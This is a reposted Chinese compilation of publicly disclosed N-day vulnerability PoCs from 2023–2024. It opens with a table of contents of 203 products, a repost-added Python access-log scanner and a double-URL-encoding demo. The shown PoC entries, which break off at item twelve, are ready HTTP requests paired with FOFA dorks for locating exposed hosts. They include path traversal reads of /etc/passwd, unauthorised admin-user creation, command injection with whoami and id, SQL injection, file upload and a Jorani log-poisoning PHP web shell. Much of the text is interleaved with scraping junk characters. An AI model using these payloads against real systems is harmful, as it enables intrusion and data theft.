Internet public vulnerability compilation, 2023-09 to 2024-06 (repost)
Posted 2024-6-5 14:31:29
Internet public vulnerability compilation, 2023-09 to 2024-06
道一安全 (Daoyi Security), 2024-06-05 07:41, Beijing
The following article is reposted from 网络安全新视界; author: 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities accounts for a large share of real-world attacks, so we hope this article is of some help to defenders. Defenders can use its contents to check their own systems for exposure.

Sources: the article covers 203 PoCs for high-impact vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All were collected from other public accounts or websites and compiled for publication by the 网络安全新视界 team.

Patches: every vulnerability listed is already public; contact the product vendor for patches or remediation guidance.

Content: because of length limits, a few very long PoCs are replaced with the word PAYLOAD; search for the complete PoC yourself if you need it.

Legal: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend and the relevant content will be removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list". This article is the complete list; when using it, press F12 and search for keywords.

Bookmark this article if it is useful to you. You can also follow the public account (网络安全新视界).
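The request shapes in the PoC list below (directory traversal, error- and time-based SQL injection functions, ${jndi:} lookups, fastjson @type keys, and Spring-style path-matching bypasses such as ;.ico) can be turned directly into a log check, which is the "risk check" the purpose paragraph asks defenders to do. The script below is an added example written for this repost; it is not code from the original article or from 网络安全新视界. The log lines, IP addresses and timestamps are constructed for the example, and the indicator set is an assumption to be tuned for your own applications.

```python
"""Scan combined-format web access logs for request shapes matching the N-day PoCs."""
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (not real traffic). The request targets mirror
# the PoC shapes listed on this page; the last field of line 4 is a User-Agent.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jun/2024:10:00:01 +0800] "GET /static/../../../../etc/passwd HTTP/1.1" 200 1234
10.0.0.6 - - [05/Jun/2024:10:00:02 +0800] "GET /jshERP-boot/user/getAllList;.ico HTTP/1.1" 200 5120
10.0.0.7 - - [05/Jun/2024:10:00:03 +0800] "GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27a%27=%27a HTTP/1.1" 500 300
10.0.0.8 - - [05/Jun/2024:10:00:04 +0800] "POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1" 200 40 "-" "${jndi:ldap://example.invalid/a}"
10.0.0.9 - - [05/Jun/2024:10:00:05 +0800] "GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1" 200 10
10.0.0.10 - - [05/Jun/2024:10:00:06 +0800] "GET /index.html HTTP/1.1" 200 100
10.0.0.11 - - [05/Jun/2024:10:00:07 +0800] "GET /search/index.php?keyword=%2527%2520and%2520(extractvalue(1,concat(0x7e,(select%2520user()),0x7e)))%2523 HTTP/1.1" 200 100
"""

# Apache/Nginx "combined" format; referer and user-agent are optional.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Indicator set (an assumption; extend it for your own stack). Matched against the
# fully percent-decoded target, referer and user-agent.
INDICATORS = {
    "path_traversal": re.compile(r"\.\./|\.\.\\|/etc/passwd|win\.ini|/WEB-INF/", re.I),
    "sqli_error_based": re.compile(r"\b(?:extractvalue|updatexml|hashbytes)\s*\(", re.I),
    "sqli_time_based": re.compile(r"\bwaitfor\s+delay\b|\bsleep\s*\(", re.I),
    "jndi_lookup": re.compile(r"\$\{jndi:", re.I),
    "fastjson_autotype": re.compile(r'"@type"\s*:'),
    "path_match_bypass": re.compile(r";[^/\s]*\.(?:ico|png|css|js)\b|\.(?:ico|png|css|js)/\.\./", re.I),
}


def full_decode(value, rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded payloads become visible."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(line):
    """Return a finding dict for one log line, or None if nothing matches."""
    m = LINE_RE.match(line)
    if not m:
        return None
    haystack = full_decode(" ".join([m.group("target"), m.group("referer") or "", m.group("ua") or ""]))
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
    if not hits:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"), "target": m.group("target"), "hits": hits}


def scan(log_text):
    """Scan every line of a log and return the findings in file order."""
    return [f for f in map(classify, log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], ",".join(f["hits"]), f["target"][:80])
```

Run it against a real access log with scan(open(path).read()); the decoding step matters because the Doccms PoC in the list double-encodes its statement, which a single-pass filter never sees as SQL. Request bodies (the fastjson and log4j payloads) only show up if your proxy or WAF logs them, so the fastjson_autotype indicator will stay silent on plain access logs.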
Contents

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user addition
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. Hongfan iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. Hongfan HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 one-face-pass smart management platform 1.0.55.0.0.1 permission bypass
66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
81. Uniview (宇视科技) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. DBAPPSecurity 明御 security gateway aaa_local_web_preview file upload
88. DBAPPSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi An Xin 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass / template injection
149. AJ-Report open-source dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. Hongjing EHR OutputCode arbitrary file read
169. Hongjing EHR downlawbase SQL injection
170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle tracking and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. Cockpit assetsmanager_upload file upload
200. SeaCMS dmku SQL injection
201. 方正 omnimedia news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

  I# R1 E4 o! l) i' IPOC列表
6 o5 F3 W- Y) c  J, b
8 t9 P- A; G) m6 c0 u02
0 p9 x6 R- Q, i( Y) m
  S5 y( f; g1 ?2 a1 u2 m; j. z1 }1. StarRocks MPP数据库未授权访问
8 @# x9 y/ Q' \- GFOFA :title="StarRocks"8 k' G) @' Z7 J- u  f% M' b1 C( g
GET /mem_tracker HTTP/1.18 _& B; }% Y4 g! o
Host: URL
, J: P+ g" Y8 D$ f* u
+ a7 H: t, i6 j1 A( f$ X) d! L1 `2 j. g+ n2 X2 A
2. Casdoor系统static任意文件读取
8 D  l4 {, r$ R9 g4 @; jFOFA :title="Casdoor"
+ n+ @& e8 R2 z' DGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
0 J- P% {" k" M' |! lHost: xx.xx.xx.xx:9999
9 R5 R( M& }7 c7 j( ]7 X/ TUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
" Q. @# r+ q$ o3 A& \Connection: close
5 s% r5 l& N0 m9 c1 ZAccept: */*/ K' Y" b3 u) h. g0 N1 H5 i0 ?/ V
Accept-Language: en
6 h3 q1 b6 m. IAccept-Encoding: gzip
$ h9 G5 u1 J! p+ ^8 e* x8 y; o) v1 E5 _7 ?# ^
, \! V; v' i) Y& s" ?( a' b' `. \
3. EasyCVR智能边缘网关 userlist 信息泄漏
: H' T* V6 M" ^0 ]0 M" VFOFA :title="EasyCVR"" ]- q1 N7 v1 L6 o4 H
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.10 K- F1 `( J5 p6 Q
Host: xx.xx.xx.xx
/ E0 X* w; q6 R9 H+ Z# e0 ?! |; E. `
) t, N& H- u9 \8 r2 o9 Z" l) }  S8 p
! t( X) E: R  L4. EasyCVR视频管理平台存在任意用户添加# ?* H8 B7 w3 B5 M
FOFA :title="EasyCVR"' l/ q3 U: |# G( x  X, R

1 F. T1 b- P0 Opassword更改为自己的密码md53 \& V+ c: g/ t0 m/ N, C! S6 c; C6 T
POST /api/v1/adduser HTTP/1.1
( q; C1 W9 {: `# @; a4 eHost: your-ip  w" t# _/ t& t2 o( z2 W
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
! a9 A8 _" Z/ q7 e/ q3 g3 u* W, F8 E0 \$ x
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1+ h( ?  l9 ^5 }
/ o6 A6 N: a, Q# L/ x, G
& V8 `! i7 d: H- B* m+ M) X0 i
5. NUUO NVR 视频存储管理设备远程命令执行$ c, Z5 [* b2 w7 X2 U
FOFA:title="Network Video Recorder Login"4 w3 P9 R. z9 n! ]' G
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
2 l5 Y5 e) G  B, o1 i* S$ l+ EHost: xx.xx.xx.xx# b$ c/ m' y& e5 C) M" `* e
. d* [' c, f2 |7 _: e7 c- B( B

' f+ }" c9 w- v6. 深信服 NGAF 任意文件读取& w. M! n$ o8 |3 V% p
FOFA:title="SANGFOR | NGAF"0 \5 a, a) T3 P$ Y2 i
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1& m. m- x$ Q' q# D2 \- P
Host:
4 O3 e0 x& V. [; r- d7 s4 _$ E- E, T6 @, J: P
  q) q1 m' o! g1 W
7. 鸿运主动安全监控云平台任意文件下载$ N5 a0 l4 [% t; D
FOFA:body="./open/webApi.html"  x  r5 c7 E6 I4 q: Q
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1& H4 W: g* q" R8 r! ?( j
Host:; m  G* q. D: g' h" _) Z% S
' G6 B! B# Z1 a% l. g
1 {& b- g* N4 @/ Q* B
8. 斐讯 Phicomm 路由器RCE
5 H! h* u" W' N% L' YFOFA:icon_hash="-1344736688"
% w; f% p3 W6 W' W0 e9 J( n8 K默认账号admin登录后台后,执行操作7 V; D4 s6 K9 j) J/ |$ b0 |2 `4 v
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1: V; @) c: f! v& ]( F/ R( H
Host: x.x.x.x( `8 S9 l. C3 S: @$ R' {3 W
Cookie: sysauth=第一步登录获取的cookie- M4 }8 J7 [# L  W8 S
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz- v- O; _8 D9 o% {8 P
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
* l* @0 C( P0 H  `. D' T4 Y. ~* k1 o# _! k8 d3 }' }1 `8 I
------WebKitFormBoundaryxbgjoytz: \3 i' S7 h( m9 y6 f8 W& C- E
Content-Disposition: form-data; name="wifiRebootEnablestatus"# R0 M$ x; b4 X+ [3 z3 W( @3 k) E9 c

* B7 G& l+ o2 ~* X* G%s
* {, u9 c0 f1 w" j8 r------WebKitFormBoundaryxbgjoytz
" H, q! S! u; j) E" y9 {Content-Disposition: form-data; name="wifiRebootrange"
9 F8 I  ]: R) R9 D
& ^, [) q  |& a2 h% T" ~* y12:00; id;
. c9 m/ G% y0 C. h2 J( C% u. {. N% O9 M------WebKitFormBoundaryxbgjoytz
& _5 o; C8 \8 H5 X7 \8 k' fContent-Disposition: form-data; name="wifiRebootendrange"
8 ]% Q, M9 H6 L* O4 {' e* {4 f( h) G4 D# }9 Z7 s+ L( N) ]
%s:& Q6 Q1 u2 K* W! k/ G
------WebKitFormBoundaryxbgjoytz' Q; k* G: }3 `
Content-Disposition: form-data; name="cururl2"
, w7 B8 ]6 o# R: d7 z) W+ v. b+ o& s

& w' j: W$ o/ e; `6 l3 U2 b  u------WebKitFormBoundaryxbgjoytz--
: M8 Y) h% D; F9 a; [3 s/ |+ l7 N2 V- A) u$ s0 I

) C" M  S4 x% ]9. 稻壳CMS keyword 未授权SQL注入
; m5 J4 q) m4 }! m1 XFOFA:app="Doccms", s$ C9 r1 i# r+ D8 T3 l
GET /search/index.php?keyword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~$ {) t
Host: x.x.x.x/ J; P" I1 a9 d& z. q

* e/ H4 u% V2 h+ \; t9 {% k; F
* ?- U( h: I2 @  @) N% v9 xpayload为下列语句的二次Url编码
4 l( ]( B% A: z5 Y5 T- k0 Q* K
  q, Y( x+ A" K; W) k4 }$ B- R' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
+ u  t0 `, y5 c8 l( _# D, L1 Q& [
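Double encoding is what lets this statement pass a filter that percent-decodes only once: after one decode the parentheses and quote are still %28 and %27, so no SQL keyword pattern matches, while an application that decodes a second time executes the statement. The snippet below, an added example for this repost rather than anything from the original article, produces the encoded payload from the statement above and shows what each decoding stage yields.

```python
"""Double URL-encode the Doccms injection statement and show each decoding stage."""
from urllib.parse import quote, unquote

# The statement given in the PoC above.
STATEMENT = "' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#"


def double_encode(text):
    """Percent-encode every reserved character (safe="" also encodes '/'),
    then percent-encode the resulting '%' signs a second time."""
    return quote(quote(text, safe=""), safe="")


def decode_stages(encoded):
    """Return (after one decode, after two decodes): what a single-decoding
    filter sees versus what an application that decodes again actually runs."""
    once = unquote(encoded)
    return once, unquote(once)


if __name__ == "__main__":
    encoded = double_encode(STATEMENT)
    once, twice = decode_stages(encoded)
    print("sent:        ", encoded)
    print("filter sees: ", once)
    print("app executes:", twice)
```

The defensive takeaway is the mirror image: normalize by decoding until the value stops changing (with a small round limit) before any pattern check, as the log scanner near the top of this page does.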
. F% _0 ^5 w, x, G% E: ?3 O, o10. 蓝凌EIS智慧协同平台api.aspx任意文件上传: k4 m$ s' ?4 A0 }7 a, r* u9 h
FOFA:icon_hash="953405444"1 u( T) j* l2 o! M

6 }- k1 |: {2 A8 ^文件上传后响应中包含上传文件的路径
: w, J  d! M/ q1 o! {POST /eis/service/api.aspx?action=saveImg HTTP/1.1
! Z& D# _3 F6 y" IHost: x.x.x.x:xx
! L7 `/ ~( D! ~; X. fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36; A0 P1 ]6 c& o7 I9 h2 o
Content-Length: 197
7 i& b; ]% |+ }9 e: Z& g2 X+ [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
" e" e8 @3 e$ yAccept-Encoding: gzip, deflate  T8 L3 q* B' M/ k2 F# [9 Z2 A
Accept-Language: zh-CN,zh;q=0.94 S+ F) ^$ I7 @. a3 g7 Q( B( Q
Connection: close
5 r) r. q9 ~6 B: W' x) LContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu) x. }3 j& h1 s/ ?( q
3 N! G0 x2 W: t$ S0 |
------WebKitFormBoundaryxdgaqmqu- B; p3 X) d6 I% Q  x# B/ K' |( I
Content-Disposition: form-data; name="file"filename="icfitnya.txt"- p6 @& e5 v. L  J$ Y: R; z' }
Content-Type: text/html
% F; v' i* Z/ @0 G# d1 j- Z9 S. ]& ]8 h3 C" F
jmnqjfdsupxgfidopeixbgsxbf
: V; Q  Q5 E$ b  Y3 \. c+ m------WebKitFormBoundaryxdgaqmqu--
# z4 A/ [6 B% L' @# M, h
' k! L8 n4 P6 e& @' G: M4 E9 X9 y+ [# P) I8 A
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入: n& p& D4 v5 @  y- O( _1 N% y% z5 ]
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
: c) p0 Z% f$ V. U/ i/ [GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
; M) ?( v0 b: x; T( iHost: 127.0.0.1$ Z: P/ k- `0 }' U, F! B7 ^' ?
Pragma: no-cache, C/ X$ ~/ J; n
Cache-Control: no-cache
/ X  A% G. V: h1 Z# f6 b6 JUpgrade-Insecure-Requests: 1
  b: }- b' X6 s: u4 \7 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36, y, j" @' Z& _' [8 Q( ~8 N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- S+ D6 }1 i& ~7 m+ zAccept-Encoding: gzip, deflate6 D! i* m0 b& S( ~! d
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8* j  x4 @7 Z# b2 B8 L8 I
Connection: close/ U$ ^8 P" U8 X6 Y; P
0 [8 k7 b( l) Z

# k; l* T- K2 H0 ]. _12. Jorani < 1.0.2 远程命令执行2 Z/ `; y0 R0 S" i
FOFA:title="Jorani"5 ]0 U" d7 O* d
第一步先拿到cookie
4 d1 i3 b+ c$ i: t+ H, z! iGET /session/login HTTP/1.13 p% m; k8 u, |. P; w
Host: 192.168.190.30
5 N" r  o; D+ R- i; x9 IUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
% X; q) p: q; z# x& S1 y( t: NConnection: close0 E7 _+ y2 D7 ~' j8 T! u7 i
Accept-Encoding: gzip
5 t3 T5 s1 w* }5 u/ u
0 s" X6 l8 k! D
( `! D3 X5 T, ?) s5 T' @响应中csrf_cookie_jorani用于后续请求
2 I9 S& s* S0 R! f& @4 ^. {$ }HTTP/1.1 200 OK8 y( g* V$ @  t0 G  H% a
Connection: close
* `& K, \2 R1 ECache-Control: no-store, no-cache, must-revalidate
5 W- j! Z/ o0 M) \4 Y0 G) [Content-Type: text/html; charset=UTF-8
( s1 w/ Q9 _8 ]4 ?. Z; L+ @- tDate: Tue, 24 Oct 2023 09:34:28 GMT
) n/ X" S1 X5 N$ e5 {1 FExpires: Thu, 19 Nov 1981 08:52:00 GMT; R1 a# l' w5 H; s
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT& Y, w) y3 }8 r6 ~2 b( \& x9 o
Pragma: no-cache
. j( I/ B; g  N" iServer: Apache/2.4.54 (Debian)
# b& T1 y0 c% s! aSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=// h8 f/ I9 ^' }/ w! P* i" T& ~
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
( N! j; j0 E5 r9 C+ Q, KVary: Accept-Encoding1 Y' Z: J5 l1 e4 {& P2 Y: i

8 X' V1 i3 [) y: K( `- j/ |% r& b6 O
POST请求,执行函数并进行base64编码4 H. W* G4 W) G3 y' A# i
POST /session/login HTTP/1.1
0 b. n3 F7 I6 G8 U* sHost: 192.168.190.30
$ M- }# H0 x& \! pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
8 y: |8 J! Z( W) F7 F, ]Connection: close1 F8 `9 x4 ~; i# ~
Content-Length: 252
5 N1 e, [$ ?* Z- j0 E: u8 PContent-Type: application/x-www-form-urlencoded
" w9 M+ H, E6 }Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
0 ^4 D- I7 c, F8 O; jAccept-Encoding: gzip, ^" _& |2 ?" h' ?& p8 L

& K6 @% b- h5 W' G% {csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor- y: w. \: j  ]9 h, Q

1 E9 Q0 }3 f  Q) |" {
" i6 k. W$ i. a. ?# q% C2 M& _6 ?+ p; S% R* b- a6 C# q
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串! M1 i" B0 n! L
GET /pages/view/log-2023-10-24 HTTP/1.1
